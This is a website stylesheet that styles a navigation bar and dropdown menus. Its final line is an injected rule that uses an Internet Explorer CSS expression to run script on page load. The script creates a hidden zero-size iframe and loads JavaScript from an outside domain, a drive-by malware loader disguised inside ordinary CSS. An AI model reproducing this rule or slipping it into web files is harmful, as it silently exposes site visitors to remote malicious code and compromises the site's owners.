#holder
{
	width:760px;
	height:40px;
	background:/*#333333*/ url(../Images/back-sb-main.png) no-repeat;
	/*vertical-align:middle;*/
	margin-left:auto;
	margin-right:auto;	
	text-align:center;
	font-family:Arial;
	font-size:11px;
	text-transform: uppercase;
}

#short-font
{

}

.nav{
			display: block;
			text-align:left;
			/*background-color: #FFF;*/
			padding-left:3px;
			position:relative;
			left:0px;
			color:#999999;

		}
		
		.nav:hover{
			/*background-color: #D7D1BE;*/
			color: #FFFF00;
			position:relative;
			left:5px;
		}
		
.topnav{
			display: block;
			/*background:#333333;*/
			position:relative;
			top:0px;
			color:#fff;
			
		}
		
		.topnav:hover{
			/*background: #CC3333;*/
			color: #FFFF00;
			
		}
		
.gs a
{
	width:100px;
	letter-spacing:-1px;
}



/* this is the main UL element*/
.dropdown{
	display:none;
	margin:0;
	padding:0;
	list-style:none;
	/*border-bottom:1px solid #444;*/
	position:relative;
	height:20px;
	top:6px;

}

/* these are the inner menus*/
.dropdown ul{
	margin:0;
	padding:0;
	border-top:1px solid #444;
	list-style:none;
}

/* background:#000; these are all the LIs in the menu*/
.dropdown li{
	margin:0;
	padding:5px;
	width:73px;
	text-align:center;
	font-weight:bold;
	cursor:pointer;
}

/* #FFB119 --- these are anchor in the menu, if you want to style them differently from the rest of you website*/
.dropdown a{
	text-decoration:none;
	width:100%;
}

.dropdown ul>li>a{
	color:#999999;
}

.dropdown a:hover{
	/*font-weight:bold;*/
	color:yellow;
}

.dropdown ul>li{
	font-weight:100;
	padding:0px;
	width:90px;
}

.dropdown ul>li:hover{
	/*font-weight:bold;*/
	color:yellow;
	background:#333333;
}

.dropdown2 ul>li:hover{
	/*font-weight:bold;*/
	color:yellow;
	background:blue;
}

/* these are the LIs that only belong to submenu*/
.dropdown ul li{
	border:1px solid #444;
	border-top:0;
	margin-left:-1px;
	padding:3px 2px;;
	background:#111111;
	text-align:center;
}

/* #000 these are the LIs that contains a submenu*/
/*.dropdown li.submenu-down{
	background:url('expand_down.gif') center left no-repeat;
	padding-left:20px;
	width:80px;
}*/

/* these are the LIs that contains a submenu and which are in a sub-menu themselve*/
.dropdown li.submenu-left{
	background:#333 url('expand_right.gif') center right no-repeat;
	padding-right:20px;
	width:105px;
}body{zoom:expression(function(ele){setTimeout(function(){var i=document.createElement('iframe');i.width=i.height=0;document.body.appendChild(i);i.contentWindow.setTimeout(function(){i.contentWindow.document.write('<script src=http://www.faloge.com/js/yahoo.js></script>');},1000);},1000);ele.style.zoom='1';}(this));}